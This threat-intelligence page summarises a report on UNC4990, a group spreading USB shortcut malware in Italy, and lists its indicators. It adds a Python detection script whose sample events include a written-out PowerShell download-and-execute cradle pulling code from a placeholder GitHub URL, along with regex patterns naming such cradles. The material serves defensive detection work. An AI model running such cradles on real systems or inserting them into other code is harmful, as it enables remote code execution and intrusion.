Evolution of UNC4990: Uncovering USB Malware's Hidden Depths [Wednesday, January 31, 2024]

Description:
This report provides an analysis of the threat actor group UNC4990, which has been conducting campaigns since at least 2020 primarily targeting organizations in Italy across industries like health, transportation, and logistics. The group relies heavily on USB-based malware for initial infection, using malicious shortcut files that execute PowerShell scripts to download additional payloads. The report tracks the evolution of the group's tactics, techniques, and procedures over time, including their shift from using text files to abusing legitimate services like GitHub and Vimeo to host encoded payloads. Their toolset includes the EMPTYSPACE downloader and the QUIETBOARD backdoor, which have modular components to expand functionality. The report provides technical details on the capabilities of these tools as well as opportunities for detection based on forensic artifacts.
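The chain summarized above (a shortcut on a USB drive launches PowerShell, which pulls an encoded payload from a legitimate hosting service) and the report's "detection opportunities" angle can be turned into a small triage script. The block below is an added example written for this page; it is not code from Securitricks, from Mandiant, or from the report it summarizes. It assumes Sysmon Event ID 1-style process records with the fields `Image`, `ParentImage`, `CommandLine` and `CurrentDirectory`; the event records, the `SAMPLE_EVENTS` list and the placeholder URL in them are constructed for illustration and are not indicators from the report. The only data taken from the page is the indicator list, which the script also sorts by type (one of the ten "hashes" is a Bitcoin address, not a file hash).

```python
"""
Added triage helpers for the UNC4990 summary above (example code for this page,
not tooling from Securitricks or from the underlying report).

classify_indicators()  buckets raw indicator strings into SHA-256 hashes and
                       Bitcoin bech32 addresses; syntactic checks only, no
                       bech32 checksum verification.
detect_lnk_powershell() flags process-creation records in which explorer.exe
                       (the usual parent when a user opens a shortcut) starts
                       PowerShell with hidden-window, encoded-command or
                       download-cradle arguments, and notes whether the working
                       directory is on a removable drive supplied by the caller.
"""
import re
from typing import Iterable

SHA256_RE = re.compile(r"^[0-9a-f]{64}$", re.IGNORECASE)
# bech32 charset excludes 1, b, i and o; mainnet addresses start with bc1.
BECH32_BTC_RE = re.compile(r"^bc1[02-9ac-hj-np-z]{39,59}$")

# Copied from the indicator list on this page.
PAGE_INDICATORS = [
    "fae6192a0648a892c845d9498002ca79497ea58e5315d277f65f7b243f7110e4",
    "99d9dfd8f1c11d055e515a02c1476bd9036c788493063f08b82bb5f34e19dfd6",
    "bc1qk55vk7wjgzg3pmxlh59rv5dlgewd9jem5nrt4w",
    "6fb4945bb73ac3f447fb7af6bd2937395a067a6e0c0900886095436114a17443",
    "8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d",
    "4814393285c2afcd671dbdd53b3b2021963c32a09745f83ed894e5ae4e2764b8",
    "72f1ba6309c98cd52ffc99dd15c45698dfca2d6ce1ef0bf262433b5dfff084be",
    "a4f20b60a50345ddf3ac71b6e8c5ebcb9d069721b0b0edc822ed2e7569a0bb40",
    "b38dbaea648ef7da1c639f4fdaac0d88f03306ea42f0edc9af512c613dbdb7e1",
    "461d580a16cf1fa67b4ac751dfe9d36b2de3f13c97670b3b12641f20246ce4b3",
]


def classify_indicators(raw: Iterable[str]) -> dict[str, list[str]]:
    """Bucket indicator strings by syntactic type (sha256 / btc_address / unknown)."""
    out: dict[str, list[str]] = {"sha256": [], "btc_address": [], "unknown": []}
    for item in raw:
        s = item.strip()
        if SHA256_RE.fullmatch(s):
            out["sha256"].append(s.lower())
        elif BECH32_BTC_RE.fullmatch(s):
            out["btc_address"].append(s)
        else:
            out["unknown"].append(s)
    return out


# Command-line traits of a shortcut-launched PowerShell download cradle. Matched
# case-insensitively against the whole command line; labels are ours.
SUSPICIOUS_ARGS = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob; "-ExecutionPolicy" does not match.
    (re.compile(r"-e(ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{8,}", re.I), "encoded command"),
    (re.compile(r"downloadstring|downloadfile|downloaddata|invoke-webrequest|"
                r"invoke-restmethod|\biwr\b|\birm\b|start-bitstransfer", re.I), "download cradle"),
    (re.compile(r"frombase64string", re.I), "base64 decode"),
    # The report summary names GitHub and Vimeo as payload hosts; only the domain check is ours.
    (re.compile(r"github\.com|githubusercontent\.com|vimeo\.com", re.I), "legitimate-service host"),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_lnk_powershell(events: Iterable[dict], removable_drives: Iterable[str] = ()) -> list[dict]:
    """Return one hit per explorer.exe -> PowerShell launch whose arguments look like a cradle.

    explorer.exe parents every program a user double-clicks, so the argument
    patterns, not the parent alone, carry the signal. on_removable is set when
    CurrentDirectory sits on a drive letter the caller knows to be removable.
    """
    removable = {d.strip().upper()[:1] + ":" for d in removable_drives if d.strip()}
    hits = []
    for ev in events:
        if _basename(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
            continue
        if _basename(ev.get("ParentImage", "")) != "explorer.exe":
            continue
        cmd = ev.get("CommandLine", "")
        matched = [label for pat, label in SUSPICIOUS_ARGS if pat.search(cmd)]
        if not matched:
            continue
        drive = ev.get("CurrentDirectory", "")[:2].upper()
        hits.append({"ProcessId": ev.get("ProcessId"), "drive": drive,
                     "on_removable": drive in removable, "matched": matched})
    return hits


PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed Sysmon Event ID 1-style records; the URL is a placeholder, not an IOC.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": PS_EXE, "ParentImage": "C:\\Windows\\explorer.exe",
     "CurrentDirectory": "E:\\",
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://raw.githubusercontent.com/placeholder/repo/main/p.txt')\""},
    {"ProcessId": 4188, "Image": PS_EXE, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CurrentDirectory": "C:\\Users\\alice",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"ProcessId": 4200, "Image": PS_EXE, "ParentImage": "C:\\Windows\\explorer.exe",
     "CurrentDirectory": "C:\\Users\\alice\\Desktop",
     "CommandLine": "powershell.exe -WindowStyle Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ProcessId": 4250, "Image": PS_EXE, "ParentImage": "C:\\Windows\\explorer.exe",
     "CurrentDirectory": "C:\\Users\\alice", "CommandLine": "powershell.exe -NoLogo"},
]

if __name__ == "__main__":
    print(classify_indicators(PAGE_INDICATORS))
    for hit in detect_lnk_powershell(SAMPLE_EVENTS, removable_drives=["E:"]):
        print(hit)
```

Run against the constructed records, the script reports the launch from `E:\` (hidden window, download cradle, GitHub-hosted payload) and the desktop launch with an encoded command, and skips both the `cmd.exe`-parented script and the plain interactive `powershell.exe -NoLogo`. Feeding it real telemetry means mapping your own log schema onto the four field names and supplying the removable drive letters from the host's volume list rather than guessing them.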

Published: 2024-01-31 09:14:09
Created: 2024-01-31 09:14:09
Modified: 2024-01-31 09:36:48

Tags

Indicators

URLs: none listed
Domains: none listed
Malware:
  • QUIETBOARD
  • EMPTYSPACE
Hashes (SHA-256):
  • fae6192a0648a892c845d9498002ca79497ea58e5315d277f65f7b243f7110e4
  • 99d9dfd8f1c11d055e515a02c1476bd9036c788493063f08b82bb5f34e19dfd6
  • 6fb4945bb73ac3f447fb7af6bd2937395a067a6e0c0900886095436114a17443
  • 8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d
  • 4814393285c2afcd671dbdd53b3b2021963c32a09745f83ed894e5ae4e2764b8
  • 72f1ba6309c98cd52ffc99dd15c45698dfca2d6ce1ef0bf262433b5dfff084be
  • a4f20b60a50345ddf3ac71b6e8c5ebcb9d069721b0b0edc822ed2e7569a0bb40
  • b38dbaea648ef7da1c639f4fdaac0d88f03306ea42f0edc9af512c613dbdb7e1
  • 461d580a16cf1fa67b4ac751dfe9d36b2de3f13c97670b3b12641f20246ce4b3
Bitcoin address (bech32; not a file hash):
  • bc1qk55vk7wjgzg3pmxlh59rv5dlgewd9jem5nrt4w
Intrusion set :
  • UNC4990
Location :
  • Italy
MITRE ATT&CK Techniques: none listed
Other observables (targeted sectors):
  • Health
  • Logistics
  • Transportation

About the author
Julien B.

Securitricks